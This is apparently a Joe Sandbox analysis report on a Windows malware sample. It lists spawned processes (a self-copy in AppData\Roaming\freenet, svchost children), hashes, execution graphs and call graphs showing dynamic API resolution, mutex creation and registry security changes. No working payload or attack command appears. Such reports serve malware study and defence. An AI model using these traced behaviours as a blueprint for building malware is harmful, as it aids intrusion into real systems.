Commandline:taskeng.exe {2B3EACB2-7281-44E8-9006-229A29FB4963} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase:0x4c0000
File size:192000 bytes
MD5 hash:4F2659160AFCCA990305816946F69407
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: ucE7u0vttK.exe PID: 3568 Parent PID: 3536

General

Start time:11:06:03
Start date:05/06/2018
Path:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Imagebase:0x400000
File size:233984 bytes
MD5 hash:DE1CE3514F777178D672EE79AC398A74
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: svchost.exe PID: 3728 Parent PID: 3568

General

Start time:11:06:30
Start date:05/06/2018
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:svchost.exe
Imagebase:0xee0000
File size:20992 bytes
MD5 hash:54A47F6B5E09A77E61649109C6A08866
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: svchost.exe PID: 3916 Parent PID: 3568

General

Start time:11:07:14
Start date:05/06/2018
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:svchost.exe
Imagebase:0xee0000
File size:20992 bytes
MD5 hash:54A47F6B5E09A77E61649109C6A08866
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: ucD6u0vstJ.exe PID: 3480 Parent PID: 2932

    Execution Graph

    Execution Coverage:7.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:8%
    Total number of Nodes:75
    Total number of Limit Nodes:2

    Graph

    execution_graph 461 401000 462 401006 461->462 462->462 465 401072 462->465 464 40100e 466 40107b 465->466 467 4011ad 466->467 473 435977 466->473 475 43587e 466->475 500 435a1b 466->500 502 435996 466->502 504 4358f6 466->504 467->464 474 435a32 Sleep ExitProcess 473->474 476 4358d7 475->476 481 435871 475->481 477 43594c 476->477 478 401127 10 API calls 476->478 527 401127 477->527 482 43593b GetStartupInfoW 478->482 480 435957 483 401127 10 API calls 480->483 481->467 482->477 484 435963 483->484 485 435967 Sleep 484->485 486 43597c 484->486 487 435a32 Sleep ExitProcess 485->487 488 401127 10 API calls 486->488 489 43598d 488->489 490 435991 489->490 491 401127 10 API calls 489->491 490->487 492 4359c0 491->492 493 401127 10 API calls 492->493 494 4359dd 493->494 495 401127 10 API calls 494->495 496 4359f8 495->496 497 401127 10 API calls 496->497 498 435a12 497->498 498->490 499 401127 10 API calls 498->499 499->490 501 435a32 Sleep ExitProcess 500->501 503 435a32 Sleep ExitProcess 502->503 505 43593b GetStartupInfoW 504->505 506 401127 10 API calls 504->506 507 43594c 505->507 506->505 508 401127 10 API calls 507->508 509 435957 508->509 510 401127 10 API calls 509->510 511 435963 510->511 512 435967 Sleep 511->512 513 43597c 511->513 514 435a32 Sleep ExitProcess 512->514 515 401127 10 API calls 513->515 516 43598d 515->516 517 435991 516->517 518 401127 10 API calls 516->518 517->514 519 4359c0 518->519 520 401127 10 API calls 519->520 521 4359dd 520->521 522 401127 10 API calls 521->522 523 4359f8 522->523 524 401127 10 API calls 523->524 525 435a12 524->525 525->517 526 401127 10 API calls 525->526 526->517 528 401164 527->528 529 4011ad 528->529 530 435977 2 API calls 528->530 531 4358f6 14 API calls 528->531 532 435996 2 API calls 528->532 533 435a1b 2 API calls 528->533 534 43587e 14 API calls 528->534 529->480 530->529 531->529 532->529 533->529 534->529 535 401026 536 40107b 535->536 537 4011ad 536->537 538 435977 2 API calls 536->538 539 4358f6 14 API calls 536->539 540 435996 2 API calls 536->540 541 435a1b 2 API calls 536->541 542 43587e 14 API calls 536->542 538->537 539->537 540->537 541->537 542->537

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_00435A45 1 Function_00401246 2 Function_00435544 3 Function_00401C48 4 Function_0043584A 5 Function_00435A4F 6 Function_00401C4E 7 Function_00435156 8 Function_00439555 9 Function_0043545F 10 Function_00439C5C 11 Function_00435A63 12 Function_00401A63 13 Function_0043526B 14 Function_00435369 15 Function_0040196F 16 Function_00401072 16->0 17 Function_00435977 16->17 22 Function_0043587E 16->22 33 Function_00435A1B 16->33 76 Function_004358F6 16->76 94 Function_00435996 16->94 18 Function_00435F75 19 Function_00435D74 20 Function_00435A7B 21 Function_00438F7E 40 Function_00401127 22->40 23 Function_00401000 23->16 24 Function_00401E03 25 Function_00439106 26 Function_00401308 27 Function_00435808 28 Function_0043570E 29 Function_0043930D 30 Function_0043510C 31 Function_00401512 32 Function_00401716 34 Function_0043921B 35 Function_00401F19 36 Function_00401B1C 37 Function_0043911D 38 Function_00435B20 39 Function_00401026 39->0 39->17 39->22 39->33 39->76 39->94 40->0 40->17 40->22 40->33 40->76 40->94 41 Function_0043572A 42 Function_00435229 43 Function_00401D2D 44 Function_0040122E 45 Function_00401D33 46 Function_00435837 47 Function_00435C37 48 Function_00401A35 49 Function_0043563B 50 Function_0043583F 51 Function_0040173D 52 Function_00435E3C 53 Function_004358C7 54 Function_00435DC7 55 Function_004391C6 56 Function_00438FC5 57 Function_004351CA 58 Function_004355C9 59 Function_00435AC9 60 Function_004016CC 61 Function_00435CD2 62 Function_00435ED2 63 Function_00401DD5 64 Function_004392D5 65 Function_004355D9 66 Function_00435FE0 67 Function_004390E7 68 Function_00401AE9 69 Function_004351E9 70 Function_004011EE 71 Function_004019EF 72 Function_00401FF0 73 Function_00439BF1 74 Function_004392F0 75 Function_004351F7 76->40 77 Function_004355F6 78 Function_004019F6 79 Function_00435DFB 80 Function_004017FA 81 Function_00401EFA 82 Function_00401CFB 83 Function_00434FFF 84 Function_00435BFE 85 Function_00435EFC 86 Function_00401A80 87 Function_00401581 88 Function_00401C83 89 Function_00439587 90 Function_00438F84 91 Function_00401A8F 92 Function_0040148F 93 Function_00401F95 95 Function_0043509A 96 Function_0040199C 97 Function_0040179C 98 Function_0043509E 99 Function_00439C9C 100 Function_004352A0 101 Function_004016A5 102 Function_004354A5 103 Function_00401EA7 104 Function_004352AA 105 Function_004018A9 106 Function_004358A9 107 Function_004354AF 108 Function_00435DAF 109 Function_00427DAF 110 Function_00435BAE 111 Function_00439BB1 112 Function_004019B3 113 Function_00435AB7 114 Function_00401AB6 115 Function_004357B4 116 Function_004351BB 117 Function_004350BA 118 Function_004016BC 119 Function_004017BC 120 Function_004355BE 121 Function_00435BBE 122 Function_00435EBE 123 Function_004016BE

    Executed Functions

    Function 00435977, Relevance: 3.0, APIs: 2, Instructions: 5sleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 69 435977-435a3f Sleep ExitProcess
    C-Code - Quality: 100%
    			E00435977() {

				Sleep(0x1f4); // executed
				ExitProcess(0);
			}



    0x00435a37
    0x00435a3f

    APIs
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd
    Function 00435A1B, Relevance: 3.0, APIs: 2, Instructions: 5sleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 73 435a1b-435a3f Sleep ExitProcess
    C-Code - Quality: 100%
    			E00435A1B() {

				Sleep(0x1f4); // executed
				ExitProcess(0);
			}



    0x00435a37
    0x00435a3f

    APIs
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd
    Function 00435996, Relevance: 3.0, APIs: 2, Instructions: 5sleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 71 435996-435a3f Sleep ExitProcess
    C-Code - Quality: 100%
    			E00435996() {

				Sleep(0x1f4); // executed
				ExitProcess(0);
			}



    0x00435a37
    0x00435a3f

    APIs
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd
    Function 0043587E, Relevance: 6.1, APIs: 4, Instructions: 82sleep

    Control-flow Graph

    APIs
    • GetStartupInfoW.KERNEL32(004399C0,00000022,00439A05,00439B87), ref: 0043594A
    • Sleep.KERNEL32(00001388,0000002F,0000002E), ref: 0043596C
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd
    Function 004358F6, Relevance: 6.1, APIs: 4, Instructions: 79sleep

    Control-flow Graph

    APIs
    • GetStartupInfoW.KERNEL32(004399C0,00000022,00439A05,00439B87), ref: 0043594A
    • Sleep.KERNEL32(00001388,0000002F,0000002E), ref: 0043596C
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd

    Non-executed Functions

    Analysis Process: ucE7u0vttK.exe PID: 3492 Parent PID: 3480

    Execution Graph

    Execution Coverage:5%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:18.8%
    Total number of Nodes:714
    Total number of Limit Nodes:11

    Graph

    execution_graph 14193 3c952c SetUnhandledExceptionFilter 14194 3cfc18 14195 3cfc20 Sleep 14194->14195 14197 3cfc47 SetCurrentDirectoryW 14195->14197 14199 3cfcc3 srand 14197->14199 14217 3ceb30 14199->14217 14201 3cfcd2 14256 3cbaf0 CoInitializeEx 14201->14256 14203 3cfcd7 14211 3cfcf0 14203->14211 14259 3c3500 14203->14259 14205 3d04e6 14268 3c9480 14205->14268 14208 3d04f0 14212 3d04f5 ExitProcess 14208->14212 14211->14205 14294 3c8030 14211->14294 14215 3d0439 14319 3cbb40 14215->14319 14218 3ceb5c 14217->14218 14220 3ced4e 14218->14220 14322 3c9090 14218->14322 14220->14201 14221 3ceb72 LoadLibraryW 14221->14220 14222 3ceb91 14221->14222 14223 3c9090 2 API calls 14222->14223 14224 3ceb9f LoadLibraryW 14223->14224 14224->14220 14225 3cebb8 14224->14225 14325 3c6cb0 14225->14325 14228 3cebe6 14229 3c6cb0 2 API calls 14228->14229 14230 3cebf1 GetProcAddress 14229->14230 14230->14220 14231 3cec0e 14230->14231 14232 3c6cb0 2 API calls 14231->14232 14233 3cec19 GetProcAddress 14232->14233 14233->14220 14234 3cec36 14233->14234 14235 3c6cb0 2 API calls 14234->14235 14236 3cec41 GetProcAddress 14235->14236 14236->14220 14237 3cec5e 14236->14237 14238 3c6cb0 2 API calls 14237->14238 14239 3cec69 GetProcAddress 14238->14239 14239->14220 14240 3cec86 14239->14240 14241 3c6cb0 2 API calls 14240->14241 14242 3cec91 GetProcAddress 14241->14242 14242->14220 14243 3cecae 14242->14243 14244 3c6cb0 2 API calls 14243->14244 14245 3cecb9 GetProcAddress 14244->14245 14245->14220 14246 3cecd2 14245->14246 14247 3c6cb0 2 API calls 14246->14247 14248 3cecdd GetProcAddress 14247->14248 14248->14220 14249 3cecf6 14248->14249 14250 3c6cb0 2 API calls 14249->14250 14251 3ced01 GetProcAddress 14250->14251 14251->14220 14252 3ced1a 14251->14252 14253 3c6cb0 2 API calls 14252->14253 14254 3ced25 GetProcAddress 14253->14254 14254->14220 14255 3ced3e 14254->14255 14255->14201 14257 3cbafe 14256->14257 14258 3cbb01 CoInitializeSecurity 14256->14258 14257->14203 14258->14203 14260 3c9090 2 API calls 14259->14260 14261 3c3525 ConvertStringSecurityDescriptorToSecurityDescriptorW 14260->14261 14262 3c3548 14261->14262 14337 3cf0b0 memset GetWindowsDirectoryW 14262->14337 14265 3c3596 14266 3c35ac ExitProcess 14265->14266 14267 3c35b4 14265->14267 14272 3e0bb0 14267->14272 14269 3c9489 14268->14269 14270 3c94bd 14269->14270 14271 3c94a7 FreeLibrary 14269->14271 14270->14208 14271->14270 14273 3c9090 2 API calls 14272->14273 14274 3e0bd3 14273->14274 14275 3e0c0e 14274->14275 14276 3c9090 2 API calls 14274->14276 14277 3c9090 2 API calls 14275->14277 14279 3e0d25 14275->14279 14276->14275 14278 3e0c5b 14277->14278 14278->14279 14280 3e0c7d ??2@YAPAXI 14278->14280 14279->14211 14281 3e0cac 14280->14281 14283 3e0c90 14280->14283 14293 3e0d0e 14281->14293 14362 3c69f0 ??2@YAPAXI 14281->14362 14283->14281 14351 3c1f00 14283->14351 14284 3e0cba 14286 3c9090 2 API calls 14284->14286 14284->14293 14288 3e0cd6 14286->14288 14288->14293 14405 3e0900 14288->14405 14292 3cbb40 HeapFree 14292->14293 14293->14279 14412 3c1700 14293->14412 14295 3d1d90 10 API calls 14294->14295 14296 3c8042 14295->14296 14297 3c807b 14296->14297 14298 3d1d90 10 API calls 14296->14298 14299 3d1d90 14297->14299 14298->14296 14300 3d1da5 14299->14300 14301 3d1e50 14299->14301 14302 3c6cb0 2 API calls 14300->14302 14303 3d1e6b RtlAllocateHeap 14301->14303 14304 3d1e57 RtlReAllocateHeap 14301->14304 14305 3d1db0 LoadLibraryA 14302->14305 14303->14215 14304->14215 14306 3c6cb0 2 API calls 14305->14306 14307 3d1dca GetProcAddress 14306->14307 14308 3d1deb 14307->14308 14309 3d1de3 14307->14309 14310 3c6cb0 2 API calls 14308->14310 14309->14215 14311 3d1df6 GetProcAddress 14310->14311 14311->14309 14312 3d1e09 14311->14312 14313 3c6cb0 2 API calls 14312->14313 14314 3d1e14 GetProcAddress 14313->14314 14314->14309 14315 3d1e27 14314->14315 14316 3c6cb0 2 API calls 14315->14316 14317 3d1e32 GetProcAddress 14316->14317 14317->14309 14318 3d1e45 GetProcessHeap 14317->14318 14318->14301 14320 3cbb59 14319->14320 14321 3cbb4a HeapFree 14319->14321 14320->14205 14321->14320 14328 3d12a0 14322->14328 14324 3c90a9 14324->14221 14326 3d12a0 2 API calls 14325->14326 14327 3c6cc0 GetProcAddress 14326->14327 14327->14220 14327->14228 14331 3c50b0 14328->14331 14332 3c5218 14331->14332 14334 3c50d0 14331->14334 14332->14324 14333 3c5186 memset 14335 3c519c 14333->14335 14334->14332 14334->14333 14334->14335 14335->14332 14336 3c5202 memcpy 14335->14336 14336->14332 14338 3cf0ec 14337->14338 14339 3cf0f8 GetVolumeInformationW 14337->14339 14338->14339 14340 3cf12c 14339->14340 14341 3c9090 2 API calls 14340->14341 14342 3cf166 14341->14342 14343 3c9090 2 API calls 14342->14343 14344 3cf177 14343->14344 14347 3d0c10 14344->14347 14348 3d0c1c 14347->14348 14349 3d0c2d _vsnwprintf 14348->14349 14350 3c3572 CreateMutexW 14348->14350 14349->14350 14350->14265 14352 3c1f2a 14351->14352 14353 3c1f20 14351->14353 14354 3c1fae 14352->14354 14355 3c9090 2 API calls 14352->14355 14353->14281 14354->14281 14356 3c1f50 14355->14356 14356->14354 14357 3c1f85 14356->14357 14358 3cbb40 HeapFree 14356->14358 14359 3d1d90 10 API calls 14357->14359 14358->14357 14360 3c1f90 14359->14360 14360->14354 14361 3c1f99 memcpy 14360->14361 14361->14354 14363 3c6a15 14362->14363 14364 3c6a22 ??2@YAPAXI 14363->14364 14365 3c6a30 14364->14365 14366 3c9090 2 API calls 14365->14366 14367 3c6a4e 14366->14367 14416 3c3c70 14367->14416 14370 3c6a8b 14372 3c6ae2 14370->14372 14379 3c6abf 14370->14379 14422 3e09a0 14370->14422 14371 3c9090 2 API calls 14373 3c6a77 14371->14373 14374 3c9090 2 API calls 14372->14374 14376 3c3c70 11 API calls 14373->14376 14381 3c6af2 14374->14381 14376->14370 14377 3c6ab4 14378 3cbb40 HeapFree 14377->14378 14378->14379 14379->14372 14430 3ccb70 14379->14430 14380 3c6b24 14384 3ccb70 2 API calls 14380->14384 14388 3c6b3c 14380->14388 14381->14380 14443 3c9020 14381->14443 14386 3c6b33 ??3@YAXPAX 14384->14386 14386->14388 14387 3c6b4e 14390 3c6b90 14387->14390 14393 3ccb70 2 API calls 14387->14393 14388->14387 14391 3c6b68 14388->14391 14389 3c6c38 14389->14284 14450 3c2150 14390->14450 14391->14389 14391->14390 14394 3ccb70 2 API calls 14391->14394 14395 3c6b65 ??3@YAXPAX 14393->14395 14394->14395 14395->14390 14397 3c6c12 14397->14389 14400 3ccb70 2 API calls 14397->14400 14398 3ccb70 2 API calls 14399 3c6c09 ??3@YAXPAX 14398->14399 14399->14397 14402 3c6c1d ??3@YAXPAX 14400->14402 14402->14284 14403 3c9090 2 API calls 14404 3c6bbc 14403->14404 14404->14389 14404->14397 14404->14398 14406 3d1d90 10 API calls 14405->14406 14407 3e0919 14406->14407 14408 3c9090 2 API calls 14407->14408 14409 3e096c 14408->14409 14410 3cbb40 HeapFree 14409->14410 14411 3e0989 14410->14411 14411->14292 14413 3c1709 14412->14413 14414 3c1715 ??3@YAXPAX 14412->14414 14413->14414 14415 3cbb40 HeapFree 14413->14415 14414->14279 14415->14414 14418 3c3ca0 14416->14418 14417 3c3cd9 14417->14370 14417->14371 14418->14417 14419 3d1d90 10 API calls 14418->14419 14420 3c3ce8 14419->14420 14420->14417 14421 3cbb40 HeapFree 14420->14421 14421->14417 14423 3e0a05 14422->14423 14427 3e09b4 14422->14427 14467 3cbdd0 14423->14467 14424 3e0a2f 14424->14377 14427->14424 14427->14427 14428 3c9020 15 API calls 14427->14428 14429 3e09f7 14428->14429 14429->14377 14431 3ccb80 SysFreeString 14430->14431 14437 3ccb87 14430->14437 14431->14437 14432 3ccbaa 14435 3cbb40 HeapFree 14432->14435 14433 3ccbce 14434 3cbb40 HeapFree 14434->14437 14436 3ccbb3 14435->14436 14438 3cbb40 HeapFree 14436->14438 14437->14432 14437->14433 14437->14434 14439 3ccbbc 14438->14439 14440 3cbb40 HeapFree 14439->14440 14441 3ccbc5 14440->14441 14442 3cbb40 HeapFree 14441->14442 14442->14433 14444 3c68a0 13 API calls 14443->14444 14445 3c9055 14444->14445 14446 3c9068 14445->14446 14447 3cd750 13 API calls 14445->14447 14448 3c9077 14446->14448 14449 3cbb40 HeapFree 14446->14449 14447->14446 14448->14380 14449->14448 14451 3c9090 2 API calls 14450->14451 14452 3c2178 14451->14452 14453 3c3c70 11 API calls 14452->14453 14454 3c218c 14453->14454 14455 3c21e1 14454->14455 14457 3c9090 2 API calls 14454->14457 14456 3c21fd 14455->14456 14458 3c220f 14455->14458 14566 3c7530 SysAllocString 14455->14566 14456->14458 14462 3cbb40 HeapFree 14456->14462 14459 3c21a1 14457->14459 14458->14403 14458->14404 14460 3c3c70 11 API calls 14459->14460 14463 3c21b5 14460->14463 14462->14458 14463->14455 14464 3c9090 2 API calls 14463->14464 14465 3c21cd 14464->14465 14466 3c3c70 11 API calls 14465->14466 14466->14455 14474 3c1050 14467->14474 14471 3cbe23 14471->14377 14472 3cbe14 14472->14471 14473 3cbb40 HeapFree 14472->14473 14473->14471 14477 3c1085 14474->14477 14475 3c10fc 14476 3c1124 14475->14476 14478 3cbb40 HeapFree 14475->14478 14476->14472 14482 3cd750 14476->14482 14477->14475 14479 3d1d90 10 API calls 14477->14479 14478->14476 14480 3c10bd 14479->14480 14480->14475 14492 3c68a0 14480->14492 14483 3cd7d1 14482->14483 14484 3cd767 14482->14484 14483->14472 14558 3c1170 14484->14558 14486 3cd77d 14487 3cd7c3 14486->14487 14488 3cd784 SysAllocString 14486->14488 14487->14483 14489 3cbb40 HeapFree 14487->14489 14488->14487 14491 3cd795 SysFreeString 14488->14491 14489->14483 14491->14487 14493 3c68cd 14492->14493 14494 3c69df 14492->14494 14515 3c6040 14493->14515 14494->14475 14496 3c68df 14497 3c6962 14496->14497 14498 3c6040 11 API calls 14496->14498 14499 3c69bf 14497->14499 14501 3cbb40 HeapFree 14497->14501 14500 3c68f8 14498->14500 14502 3c69cf 14499->14502 14504 3cbb40 HeapFree 14499->14504 14500->14497 14526 3c76e0 14500->14526 14501->14499 14502->14494 14506 3cbb40 HeapFree 14502->14506 14504->14502 14506->14494 14508 3c693f 14508->14497 14509 3c694a 14508->14509 14510 3c6977 14508->14510 14547 3c5900 14509->14547 14512 3d1d90 10 API calls 14510->14512 14513 3c6981 14512->14513 14513->14497 14514 3c698d memcpy 14513->14514 14514->14497 14516 3c605b 14515->14516 14517 3c6065 14515->14517 14516->14496 14518 3d1d90 10 API calls 14517->14518 14521 3c6070 14518->14521 14520 3c60d2 14522 3c60ef 14520->14522 14524 3cbb40 HeapFree 14520->14524 14521->14520 14525 3c60fb 14521->14525 14552 3cf720 14521->14552 14523 3cbb40 HeapFree 14522->14523 14523->14525 14524->14522 14525->14496 14528 3c7710 14526->14528 14527 3c691f 14527->14497 14534 3cdaf0 14527->14534 14528->14527 14529 3d1d90 10 API calls 14528->14529 14530 3c77aa 14529->14530 14530->14527 14531 3c77b3 memcpy 14530->14531 14532 3c77e0 14531->14532 14532->14527 14533 3cbb40 HeapFree 14532->14533 14533->14527 14536 3cdb1e 14534->14536 14535 3cdb22 14535->14508 14536->14535 14537 3cf720 11 API calls 14536->14537 14538 3cdb66 14537->14538 14539 3c9090 2 API calls 14538->14539 14542 3cdbee 14538->14542 14540 3cdb82 14539->14540 14540->14542 14544 3c9090 2 API calls 14540->14544 14541 3cdc68 14541->14508 14542->14541 14543 3cbb40 HeapFree 14542->14543 14543->14541 14545 3cdbb1 14544->14545 14545->14542 14546 3c9090 2 API calls 14545->14546 14546->14542 14548 3d1d90 10 API calls 14547->14548 14549 3c5919 14548->14549 14550 3c5941 14549->14550 14551 3cbb40 HeapFree 14549->14551 14550->14497 14551->14550 14554 3cf756 14552->14554 14553 3cf7f8 14553->14521 14554->14553 14555 3d1d90 10 API calls 14554->14555 14556 3cf7d2 14555->14556 14556->14553 14557 3cbb40 HeapFree 14556->14557 14557->14553 14559 3c1195 14558->14559 14560 3c11f5 14559->14560 14561 3d1d90 10 API calls 14559->14561 14560->14486 14562 3c11a6 14561->14562 14563 3c11e5 14562->14563 14564 3cbb40 HeapFree 14562->14564 14563->14486 14565 3c11d5 14564->14565 14565->14486 14567 3c7547 14566->14567 14569 3c7555 14566->14569 14568 3c754e SysFreeString 14567->14568 14567->14569 14568->14569 14569->14456 14570 3cfd15 14588 3ce7d0 14570->14588 14572 3cfd25 14573 3cfd2d ??2@YAPAXI 14572->14573 14574 3cfd40 14573->14574 14591 3ce850 14574->14591 14576 3cfd47 14595 3c3d50 14576->14595 14578 3c9480 FreeLibrary 14579 3d04f0 14578->14579 14582 3d04f5 ExitProcess 14579->14582 14580 3cfd54 14581 3c8030 10 API calls 14580->14581 14587 3d04e6 14580->14587 14583 3d042e 14581->14583 14584 3d1d90 10 API calls 14583->14584 14585 3d0439 14584->14585 14586 3cbb40 HeapFree 14585->14586 14586->14587 14587->14578 14638 3e0790 memset 14588->14638 14592 3ce868 14591->14592 14593 3ce88c CoCreateInstance 14592->14593 14594 3ce86c 14592->14594 14593->14576 14594->14576 14596 3c3d56 14595->14596 14598 3c62c2 14596->14598 14599 3c8030 10 API calls 14596->14599 14597 3c65d9 14597->14580 14598->14597 14600 3cbb40 HeapFree 14598->14600 14601 3c629e 14599->14601 14600->14597 14709 3c32c0 14601->14709 14604 3c62c7 14720 3c5bd0 14604->14720 14605 3c62b7 14780 3e0580 14605->14780 14608 3c62d2 14608->14598 14609 3c9090 2 API calls 14608->14609 14610 3c62eb 14609->14610 14611 3c9090 2 API calls 14610->14611 14612 3c62f9 VariantInit VariantInit 14611->14612 14763 3e0290 SysAllocString 14612->14763 14614 3c634a 14765 3c13c0 ??2@YAPAXI 14614->14765 14616 3c636d 14617 3c13c0 2 API calls 14616->14617 14618 3c6390 14617->14618 14768 3c7cf0 14618->14768 14621 3c7cf0 4 API calls 14622 3c641f VariantClear VariantClear VariantClear 14621->14622 14623 3c65a2 14622->14623 14624 3c6442 14622->14624 14776 3c6d30 14623->14776 14624->14598 14626 3c5bd0 17 API calls 14624->14626 14627 3c6459 14626->14627 14627->14598 14628 3c9090 2 API calls 14627->14628 14629 3c6472 VariantInit VariantInit VariantInit 14628->14629 14630 3c13c0 2 API calls 14629->14630 14631 3c64db 14630->14631 14632 3c13c0 2 API calls 14631->14632 14633 3c64fe 14632->14633 14634 3c7cf0 4 API calls 14633->14634 14635 3c6583 14634->14635 14636 3c7cf0 4 API calls 14635->14636 14637 3c658b VariantClear VariantClear VariantClear 14636->14637 14637->14598 14639 3c9090 2 API calls 14638->14639 14640 3e07be 14639->14640 14653 3e0640 14640->14653 14643 3c9090 2 API calls 14644 3e07e7 StrStrW 14643->14644 14663 3cf630 14644->14663 14646 3e0806 14647 3e0640 12 API calls 14646->14647 14648 3e080d memset 14647->14648 14649 3c9090 2 API calls 14648->14649 14650 3e0829 14649->14650 14651 3e0640 12 API calls 14650->14651 14652 3ce7e0 14651->14652 14652->14572 14654 3e065c StrChrW RegOpenKeyExW 14653->14654 14655 3e0657 14653->14655 14656 3e0692 GetSecurityInfo 14654->14656 14662 3e073a memset 14654->14662 14655->14654 14657 3e06b9 14656->14657 14656->14662 14678 3c80a0 14657->14678 14660 3e0718 SetNamedSecurityInfoW 14660->14662 14661 3e06f7 RegSetValueExW 14661->14660 14662->14643 14664 3cf63e 14663->14664 14665 3cf63a 14663->14665 14666 3d1d90 10 API calls 14664->14666 14665->14646 14667 3cf65a memset memcpy 14666->14667 14671 3cf68a 14667->14671 14668 3cf6fc 14670 3cbb40 HeapFree 14668->14670 14672 3cf707 14670->14672 14671->14668 14674 3cf6e2 14671->14674 14696 3ccea0 14671->14696 14704 3c97e0 14671->14704 14672->14646 14675 3ccea0 4 API calls 14674->14675 14676 3cf6ec 14675->14676 14676->14668 14677 3c97e0 5 API calls 14676->14677 14677->14668 14679 3c80e9 14678->14679 14680 3c8121 memset 14679->14680 14683 3c824a StrChrW RegOpenKeyExW 14679->14683 14681 3c817e 14680->14681 14682 3c8188 SetSecurityInfo 14681->14682 14681->14683 14682->14683 14684 3c81b1 14682->14684 14683->14660 14683->14661 14684->14683 14692 3e1ff0 14684->14692 14687 3c81f4 SetSecurityInfo 14687->14683 14688 3c8216 